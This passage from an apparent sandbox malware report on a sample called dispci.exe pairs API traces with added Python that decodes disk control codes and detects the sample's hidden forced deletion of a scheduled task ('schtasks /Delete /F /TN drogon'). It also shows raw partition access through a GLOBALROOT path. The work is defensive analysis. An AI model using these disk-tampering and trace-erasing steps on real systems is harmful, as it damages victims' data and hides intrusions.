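  • Part of subcall function 00DF35D0: CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00DF2DD3), ref: 00DF3616
• CloseHandle.KERNEL32 ref: 00DF30EF
APIs
• FindFirstVolumeW.KERNEL32(?,00000104), ref: 00DF4802
  • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF213D
  • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00DF2196
"""

# One "• Name.MODULE(args), ref: ADDR" bullet, optionally prefixed with the subcall note.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
HEX8 = re.compile(r"^[0-9A-F]{8}$")
ApiCall = namedtuple("ApiCall", "name module args ref parent")  # parent: subcall address or ""

# CTL_CODE field names from the Windows DDK.  Which device types to flag is my
# assumption for a disk-tampering sample; the report does not name them.
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x22: "FILE_DEVICE_UNKNOWN"}

def parse_listing(text):
    """One list of ApiCall per 'APIs' header, in report order."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"] or ""))
        elif line and not line.startswith("•"):
            current = None  # another header (Strings, Memory Dump Source, ...) ends the API list
    return records

def decode_ctl_code(code):
    """Invert CTL_CODE: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    return {"device_type": code >> 16, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}

def describe_ioctl(code):
    f = decode_ctl_code(code)
    dev = DEVICE_TYPES.get(f["device_type"], f"0x{f['device_type']:X}")
    return (f"0x{code:08X} = CTL_CODE({dev}, 0x{f['function']:X}, "
            f"{METHODS[f['method']]}, {ACCESS[f['access']]})")

def ioctl_codes(records):
    """Control codes from functions that call DeviceIoControl.  The report assigns stack
    slots to the nearest call, so the code often lands on a neighbouring bullet; scan every
    8-digit hex argument in such a function and keep those whose device-type field we flag."""
    found = set()
    for rec in (r for r in records if any(c.name == "DeviceIoControl" for c in r)):
        for call in rec:
            for a in call.args:
                if HEX8.match(a) and decode_ctl_code(int(a, 16))["device_type"] in DEVICE_TYPES:
                    found.add(int(a, 16))
    return found

def device_paths(records):
    """First argument of every CreateFileW whose path starts with two backslashes."""
    return {c.args[0] for r in records for c in r
            if c.name == "CreateFileW" and c.args and c.args[0].startswith("\\\\")}

def summarize(text):
    records = parse_listing(text)
    out = [f"functions parsed: {len(records)}"]
    out += [f"device opened: {p}" for p in sorted(device_paths(records))]
    out += [describe_ioctl(c) for c in sorted(ioctl_codes(records))]
    return out

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE)))
```

Run stand-alone it lists the two device paths opened (`\\.\dcrypt` and the raw first partition via the GLOBALROOT ArcName) and the four control codes decoded as CTL_CODE(FILE_DEVICE_UNKNOWN, 0x7 / 0xD / 0xF / 0x10, METHOD_BUFFERED, FILE_ANY_ACCESS). The function numbers are what you would look up in the driver's IOCTL table to name the operations the tool issues against `\\.\dcrypt`; the report itself does not say what they do.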
                                                                      APIs
                                                                      • GetFileSizeEx.KERNEL32(?,?), ref: 00DF1723
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00DF1744
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00DF175D
                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00DF1779
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocLocalPointerReadSize
                                                                      • String ID:
                                                                      • API String ID: 3779513235-0
                                                                      • Opcode ID: 2ce78a4edc008ba020863de3c62c4014706a567dd8049d0e7f2a4eec4ccf8556
                                                                      • Instruction ID: e0d30cd21385485237be524f7f887cc6425f8c5871748448e17570b3881adcfa
                                                                      • Opcode Fuzzy Hash: 2ce78a4edc008ba020863de3c62c4014706a567dd8049d0e7f2a4eec4ccf8556
                                                                      • Instruction Fuzzy Hash: 3C117074A00209EFDB10EFB68C49BBFB7BCEB04310F148955AA58E3140E770EA14CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction ID: 8ca12a646594ffde0c572e513ce9737d0a1d9d3e4a9af0776bba0128f4a99140
                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction Fuzzy Hash: CF112E7240018EBB8F165F84DC41CEE3F62BF19794B5AC425FB6859031D736C9B1ABA1
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00DF66A9), ref: 00DFADA1
                                                                      • __malloc_crt.LIBCMT ref: 00DFADD0
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DFADDD
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                      • String ID:
                                                                      • API String ID: 237123855-0
                                                                      • Opcode ID: fdaf8724a798048410cac18e5edef758cbb979e3f8470a7a8de9cf9f3c226f8d
                                                                      • Instruction ID: 6127b0b17fb86bf3faf6ccca927d7cb0347a644fc4645ac3729ebab61078cd41
                                                                      • Opcode Fuzzy Hash: fdaf8724a798048410cac18e5edef758cbb979e3f8470a7a8de9cf9f3c226f8d
                                                                      • Instruction Fuzzy Hash: 83F089BB5011186ACF216739BC458BB5778DFD63A631FC417F949C3600F7208D8582B2
                                                                      APIs
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      • CreateThread.KERNEL32(00000000,00000000,00DF5A50,00000000,00000000,00000000), ref: 00DF5BD8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Create$DirectoryEnvironmentProcessSystemThreadVariable_vswprintf_slstrcat
                                                                      • String ID: drogon$schtasks /Delete /F /TN %ws
                                                                      • API String ID: 2360524982-1803547564
                                                                      • Opcode ID: 4249ce67a6d45e64575aa6a059fbb4530cfe13e5a76dbd1d23fd920c6fd3bd9b
                                                                      • Instruction ID: 56239580d789cda269929a81757d0718dc937161b789b92f1876265e326c5e7d
                                                                      • Opcode Fuzzy Hash: 4249ce67a6d45e64575aa6a059fbb4530cfe13e5a76dbd1d23fd920c6fd3bd9b
                                                                      • Instruction Fuzzy Hash: FBF0657078170CBBE610BB60AC47F7A7B64D704B00FA14164B7067A2C6D9A17D5C4AA4
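The function above (subcall 00DF5810) resolves cmd.exe from the ComSpec environment variable, falling back to GetSystemDirectoryW plus "\cmd.exe", formats the command "schtasks /Delete /F /TN %ws" with _vswprintf_s, and launches it through CreateProcessW with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW), so no console is shown. The same function references the string "drogon". The following detection sketch is an added example, not code from the report or from the sample: it scans Sysmon-style process-creation records for a forced scheduled-task deletion and rates it by task name and parent lineage. That "drogon" is the value substituted for %ws is an inference from the two strings sharing one function; the sample events, file paths, the "/c" form of the cmd.exe command line and the BENIGN_PARENTS list are all constructed assumptions.

```python
"""Flag `schtasks /Delete /F /TN <task>` launches in process-creation telemetry.

Added example for the dispci function above; not code from the report or the
sample. Events, paths and the parent allowlist are constructed assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "drogon" appears as a string in the same function as the schtasks format
# string; treating it as the deleted task name is an inference, so it lives in
# data, not in the matching logic.
WATCHLIST = {"drogon"}

# Parents that routinely spawn cmd.exe/schtasks.exe; assumed list, tune per estate.
BENIGN_PARENTS = {"explorer.exe", "powershell.exe", "services.exe", "svchost.exe"}

SCHTASKS = re.compile(r'(?:^|[\s"\\])schtasks(?:\.exe)?(?=[\s"]|$)', re.IGNORECASE)
DELETE_FLAG = re.compile(r"(?:^|\s)/delete(?=\s|$)", re.IGNORECASE)
FORCE_FLAG = re.compile(r"(?:^|\s)/f(?=\s|$)", re.IGNORECASE)
TASK_NAME = re.compile(r'(?:^|\s)/tn\s+("[^"]*"|\S+)', re.IGNORECASE)


@dataclass
class Finding:
    image: str
    parent: str
    task: str
    forced: bool
    severity: str  # "high", "medium" or "low"


def task_deletion(cmdline: str) -> Optional[str]:
    """Return the task name when cmdline runs schtasks /Delete, else None.

    /TN is mandatory for /Delete, so a command without it is not a deletion.
    """
    if not SCHTASKS.search(cmdline) or not DELETE_FLAG.search(cmdline):
        return None
    m = TASK_NAME.search(cmdline)
    return m.group(1).strip('"') if m else None


def in_windows_root(path: str) -> bool:
    """True for binaries sitting directly in C:\\Windows (assumes the default
    system drive); the report notes executables dropped there and started."""
    return ntpath.dirname(path).lower().rstrip("\\") == r"c:\windows"


def assess(ev: Dict[str, str]) -> Optional[Finding]:
    """Rate one Sysmon Event ID 1 style record (Image/ParentImage/CommandLine)."""
    task = task_deletion(ev["CommandLine"])
    if task is None:
        return None
    parent_name = ntpath.basename(ev["ParentImage"]).lower()
    unusual_parent = parent_name not in BENIGN_PARENTS
    forced = FORCE_FLAG.search(ev["CommandLine"]) is not None
    if task.lower() in WATCHLIST or (unusual_parent and in_windows_root(ev["ParentImage"])):
        severity = "high"
    elif forced and unusual_parent:
        severity = "medium"
    else:
        severity = "low"
    return Finding(ev["Image"], ev["ParentImage"], task, forced, severity)


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for f in map(assess, events) if f is not None]


# Constructed sample telemetry; none of these lines come from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\dispci.exe", "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\dispci.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\dispci.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN drogon"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /Delete /F /TN drogon"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /Query /TN \Microsoft\Windows\Defrag\ScheduledDefrag"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c schtasks /Delete /F /TN MyBackup"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "CommandLine": r"schtasks /Delete /F /TN Updater"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] task={f.task!r} forced={f.forced} {f.parent} -> {f.image}")
```

The CREATE_NO_WINDOW flag is not recorded by process-creation logging, so the check keys on the command line and on one level of lineage only; correlating the grandparent (the process that spawned the hidden cmd.exe) via ProcessGuid would catch the same chain when the task name has changed.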
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer__invoke_watson
                                                                      • String ID: P\
                                                                      • API String ID: 4034010525-198795799
                                                                      • Opcode ID: f12c1e5a5547e5c882b7beb5c8affbf8befa6fe60a19b0f7b74a1eacd07b0b59
                                                                      • Instruction ID: bf27538581b4cfc4d86852c37667fd8dda5724becf1ccd1740d6694cfa79550e
                                                                      • Opcode Fuzzy Hash: f12c1e5a5547e5c882b7beb5c8affbf8befa6fe60a19b0f7b74a1eacd07b0b59
                                                                      • Instruction Fuzzy Hash: 78E0B67240410DBFEF052FA29C09CBA3E6AEB443A0B458420FE1484032D636C9B4EBB4